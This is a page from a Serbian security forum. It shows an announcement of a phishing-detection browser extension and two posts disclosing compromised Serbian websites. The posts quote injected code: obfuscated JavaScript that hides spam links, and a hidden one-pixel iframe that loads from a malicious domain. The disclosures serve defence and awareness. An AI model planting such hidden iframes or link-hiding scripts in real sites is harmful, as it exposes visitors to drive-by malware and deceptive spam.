Welcome, Guest |
You have to register before you can post on our site.
|
Forum Statistics |
» Members: 155
» Latest member: milicke
» Forum threads: 1,948
» Forum posts: 5,007
Full Statistics
|
Latest Threads |
Kompromitovan zarkons.edu...
Forum: Kompromitovani resursi
Last Post: VincaSec
06-24-2025, 02:53 PM
» Replies: 0
» Views: 131
|
Pošta i kurirske službe -...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
06-23-2025, 02:16 PM
» Replies: 134
» Views: 99,848
|
WhatsApp Scam - ponuda za...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
06-23-2025, 02:07 PM
» Replies: 27
» Views: 18,670
|
Otvorena javna rasprava o...
Forum: Vesti, zanimljivosti i razno
Last Post: milos_rs
06-23-2025, 11:36 AM
» Replies: 9
» Views: 8,124
|
gsp.rs - JKP GSP Beograd ...
Forum: Neadekvatno zaštićeni resursi
Last Post: milos_rs
06-23-2025, 11:10 AM
» Replies: 1
» Views: 207
|
OKE Green piramidalna šem...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
06-23-2025, 11:02 AM
» Replies: 4
» Views: 1,053
|
CVE‑2024‑24919: Ranjivost...
Forum: Neadekvatno zaštićeni resursi
Last Post: VincaSec
06-20-2025, 08:57 PM
» Replies: 0
» Views: 171
|
Potencijalno ranjivi Roun...
Forum: Neadekvatno zaštićeni resursi
Last Post: VincaSec
06-20-2025, 08:51 PM
» Replies: 0
» Views: 185
|
Mnogi "mediji" kao "vest"...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
06-19-2025, 10:22 PM
» Replies: 0
» Views: 154
|
Sveopšte phishing/SPAM ka...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
06-19-2025, 11:09 AM
» Replies: 15
» Views: 4,138
|
|
|
DeepPhish (browser extension) |
Posted by: bane - 09-29-2022, 02:19 AM - Forum: Alati, servisi i tutorijali
- Replies (21)
|
 |
Pozdrav svima,
Neko vreme vec razmisljam da publishujem kod od jednog zanimljivog experimenta koji sam radio u slobodne dane.
U pitanju je Chrome extenzija koja se sastoji od dve funkcionalnosti, a to je detekcija i inspekcija sajtova u toku browsinga.
Detekcija se vrsi pomocu ML random forest algoritma koji je dovoljno lagan da se izvrsi u browseru u realnom vremenu sa pre-treniranim modelom.
Svaki sajt ima svoj score koji se utvrdjuje na osnovu analize source koda. Pored toga, ovaj plugin pamti ukoliko se sigurnosni score nekog sajta kroz vreme promeni na bolje ili na gore u slucaju defacinga itd. Dokument o phishing karakteristikama na osnovu kojeg je uradjena analiza je u repozitorijumu.
Sto se tice inspekcije, kroz kontekstualni meni, tj. na desni klik na background bilo kog sajta, dolazi se do "Inspect Page with DeepPhish" opcije.
Rezultat inspekcije kao i progres iste se prikazuje zajedno sa svim detektovanim featurima sajta. U pozadini se pored besplatnih alata koristi i API nekoliko poznatih sajtova koji daju info o domenu, dns-u, whois i drugim informacijama ... Za API kljuceve potrebno je samo registrovati se uglavnom je dovoljan free nalog, osim ukoliko pravite neuobicajeno veliki broj requestova.
U sustini ovo je bundle svega sto je meni padalo na pamet da je potrebno za pasivan defence i osnovnu inspekciju, bez da palim vise alata za jednu stvar.
Svi detalji, dataset, modeli i slike su u repou na githubu: https://github.com/Omodaka9375/DeepPhish
Mislim da je ovo ok alat u edukativne svrhe i da svako moze da ga prilagodi kako zeli, ubaci druge API-je, dodaje feature itd.
Ako nekom pomaze da ustedi malo vremena super
|
|
|
Sakrivene reklame na contractor.rs |
Posted by: 1van - 09-28-2022, 06:56 PM - Forum: Kompromitovani resursi
- No Replies
|
 |
Detektovano u još u martu, server Loopia: https://twitter.com/ivanmarkovicsec/stat...4906699776.
Code: <div name="LcOkne" id="FQfMnG">
<a href="http://www.atleticoarezzo.it/">UGG Saldi</a>
<a href="http://www.associazionespazzavento.it/">Stivali UGG</a>
<a href="http://www.agendacultura.it/">UGG Saldi</a>
<a href="http://www.rumeniinitalia.it/">UGG Outlet</a>
<a href="http://www.anspilecce.it">Stivali UGG</a>
<a href="http://www.montanolucino-ut.it">UGG Outlet</a>
<a href="http://www.mtdirectionsk.it">Stivali UGG</a>
<a href="http://www.bkvietnam.dk/">UGG Sko</a>
<a href="http://www.altieco.dk/">UGG Australia</a>
<a href="http://www.vinboden.dk">Billige UGG</a>
<a href="/teletext/ralph-lauren-vaska.html" title="ralph lauren väska">ralph lauren väska</a>
<a href="/teletext/ralph-lauren-skjorta.html" title="ralph lauren skjorta">ralph lauren skjorta</a>
<a href="/teletext/ralph-lauren-jacka-herr.html" title="ralph lauren jacka herr">ralph lauren jacka herr</a>
<a href="/teletext/ralph-lauren-parfym-dam.html" title="ralph lauren parfym dam">ralph lauren parfym dam</a>
<a href="/teletext/polo-ralph-lauren-skor.html" title="polo ralph lauren skor">polo ralph lauren skor</a>
<a href="/teletext/ralph-lauren-skjorta-dam.html" title="ralph lauren skjorta dam">ralph lauren skjorta dam</a>
</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>
</body>
Code: De-obfuscated code: var _0x6977 = ["getElementById", "style", "FQfMnG", "display", “none"];
Whois:
Quote:Registrant: Contractor D.O.O.
Address: Brdjanska 458, Ripanj, Beograd, Srbija
Registration number: 07487436
Tax ID (PIB): 101745588
Administrative contact: Ilmak D.O.O.
Address: Cincar Jankova 7, Beograd, Srbija
Technical contact: Loopia d.o.o.
Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Srbija
Registration number: 17503626
|
|
|
Zaboravljeni malware link na df.rs |
Posted by: 1van - 09-28-2022, 06:47 PM - Forum: Kompromitovani resursi
- No Replies
|
 |
Detektovano još u Martu, server je Loopia: https://twitter.com/ivanmarkovicsec/stat...6026613761. Ako ovo nisu videli ko zna šta još ima tamo.
Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sajt u izradi</title>
</head>
<frameset rows="*">
<frame src="http://www.loopia.co.yu/under_construction/" />
</frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>
Domen alcobro.net se spominje na više mesta ali npr. i ovde: https://github.com/stamparm/maltrail/blo...istory.txt.
Whois:
Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626
|
|
|
cao svima |
Posted by: Aleksandar.Dj. - 09-28-2022, 09:44 AM - Forum: O Vama
- Replies (3)
|
 |
Zdravo, na forum sam naisao putem Ivanovog posta na linkedin-u u vezi inficiranja mreze katastra ransomware-om.
Dugo sam u ITju ali sam za sigurnost krenuo tek skoro da se interesujem. Nedostaje mi vec duze neki dobar forum kao sto je bio stari elitesecurity npr.
Nadam se pametnim raspravama i pozdravljam sve.
|
|
|
Pozdrav |
Posted by: pakonja - 09-27-2022, 09:00 PM - Forum: O Vama
- Replies (2)
|
 |
Ivan je "krivac" sto sam ovde, forum je interesantne tematike pa verujem da ce biti dosta zanimljivih sadrzaja...
Inace, zovem se Sasa, u IT-u sam profesionalno oko 13 godina (mreze, serveri, klijentska podrska....). Amiga 500 mi je bila prva ljubav, posle sam presao na PC - Intel Pentium 133MHz sa 14400 modemom! E taj modem je krivac za sve... tada sam poceo da se kacim na BBS-ove (posebno mi se svideo 013 Electro iz Bele Crkve), posle BBS-ova se pojavilo nesto sto se zvalo dial up internet, tada sam saznao za neke cudne skracenice IRC, ICQ, MSN, e-mail, web... i eto... malo po malo - stiglo se do 13 godina u IT-u 
Ah da, preskocio sam period studiranja i konektovanja racunara na GPRS internet preko Siemens ME45 mobilnog telefona jer tada u studentskom domu nije postojao internet a IRC ovisnost je bila jaca od svega i jednostavno sam MORAO i tamo da imam neki internet. Ne znam mozete li zamisliti moju srecu kada sam posle brdo neprespavanih noci, citanja raznorazne dokumentacije i posle kucanja gomile AT komandi uspeo da se konektujem na GPRS i uspostavim konekciju ka IRC serveru sa racunara... Bila su to neka lepa vremena, puna istrazivanja, ucenja, informacije nisu bile na dohvat ruke kao sada i za svaku informaciju si morao bas da se pomucis da je nadjes kako bi naucio nesto novo... uhh kakav flashback...! 
Tol'ko od mene za sada...
|
|
|
|